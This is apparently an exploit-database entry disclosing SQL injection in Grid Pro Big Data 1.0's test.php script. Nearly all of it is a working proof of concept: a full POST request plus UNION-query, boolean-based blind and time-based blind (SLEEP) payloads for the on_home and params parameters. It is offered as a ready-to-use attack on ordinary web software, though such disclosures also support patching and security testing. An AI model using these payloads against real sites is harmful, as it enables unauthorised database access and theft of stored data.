# Exploit Title: Grid Pro Big Data 1.0 - 'test.php' SQL Injection
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Vendor Homepage: https://codecanyon.net/item/grid-pro-big-data-table-view-data-grid-with-sort-search-and-filter-for-large-mysql-tables/20395348
# Version: 1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The multiple parameters in the 'test.php' query contain
SQLi vulnerabilities.
====================================================
# PoC : SQLi :
POST /release/pro_grid_big_data/php/test.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/release/pro_grid_big_data/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 430
Connection: keep-alive
page=1&on_home=5&table_name=be¶ms%5B0%5D%5Btype%5D=text¶ms%5B0%5D%5Bvalue%5D=¶ms%5B0%5D%5Bname%5D=Name¶ms%5B1%5D%5Btype%5D=text¶ms%5B1%5D%5Bvalue%5D=¶ms%5B1%5D%5Bname%5D=Surname¶ms%5B2%5D%5Btype%5D=num_range¶ms%5B2%5D%5Bvalue%5D%5B%5D=¶ms%5B2%5D%5Bvalue%5D%5B%5D=¶ms%5B2%5D%5Bname%5D=Age¶ms%5B3%5D%5Btype%5D=date¶ms%5B3%5D%5Bvalue%5D=¶ms%5B3%5D%5Bname%5D=Born_date&ordering=none
Parameter: on_home (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: page=2&on_home=5 UNION ALL SELECT
CONCAT(CONCAT('qjbqq','vVWAgYsZnIsAkqERYDgZibFieBTaDlfAymtKvnaO'),'qxbpq'),NULL,NULL,NULL--
LEgG&table_name=be¶ms[0][type]=text¶ms[0][value]=¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none
Parameter: params[0][value] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
page=2&on_home=5&table_name=be¶ms[0][type]=text¶ms[0][value]=%' AND
1906=1906 AND
'%'='¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload:
page=2&on_home=5&table_name=be¶ms[0][type]=text¶ms[0][value]=%' AND
SLEEP(5) AND
'%'='¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none
Parameter: params[0][name] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload:
page=2&on_home=5&table_name=be¶ms[0][type]=text¶ms[0][value]=¶ms[0][name]=Name)
AND SLEEP(5) AND
(2977=2977¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none
====================================================